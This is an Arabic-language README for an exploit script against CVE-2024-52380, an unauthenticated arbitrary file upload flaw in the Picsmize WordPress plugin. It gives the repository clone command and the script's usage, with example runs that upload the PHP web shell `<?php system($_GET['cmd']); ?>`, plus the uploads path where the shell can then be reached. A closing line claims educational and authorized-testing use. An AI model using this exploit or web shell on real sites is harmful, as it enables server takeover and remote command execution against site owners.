
إضافة Picsmize لـ WordPress معرّضة لرفع ملفات تعسفي.
إضافة Picsmize لووردبريس معرضة لثغرة رفع الملفات العشوائية.
هذا السكربت يستغل ثغرة (CVE-2024-52380) في إضافة Picsmize لووردبريس، مما يسمح للمهاجمين غير المصادق عليهم بتنفيذ رفع ملفات عشوائي. هذه الثغرة موجودة في جميع إصدارات Picsmize حتى 1.0.0 والإصدارات الأقدم. استغلال هذه الثغرة قد يؤدي إلى تنفيذ أوامر عن بُعد على الخادم المستهدف.
requests (pip install requests)git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
cd CVE-2024-52380-Exploit
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]
Check plugin version and upload a PHP file to a WordPress site.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site (e.g., http://192.168.100.74:888).
-c CONTENT, --content CONTENT
Content of the PHP file to be uploaded.
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"
يوفر السكربت وسيطين لسطر الأوامر لسهولة الاستخدام:
-u / --url (مطلوب):
-u http://example.com
-c / --content (اختياري):
<?php phpinfo(); ?>
-c "<?php system($_GET['cmd']); ?>"
/wordpress: الدليل الجذر لموقع ووردبريس.wp-content/uploads: الدليل الافتراضي لرفع الوسائط في ووردبريس.2025/01: بنية الدليل تتوافق مع السنة (2025) والشهر (يناير) بناءً على إعداد التاريخ في الخادم.http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php
هذا السكربت مخصص للأغراض التعليمية واختبارات الأمان المصرح بها فقط. الاستخدام غير المصرح به لهذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها هو أمر غير قانوني وغير أخلاقي.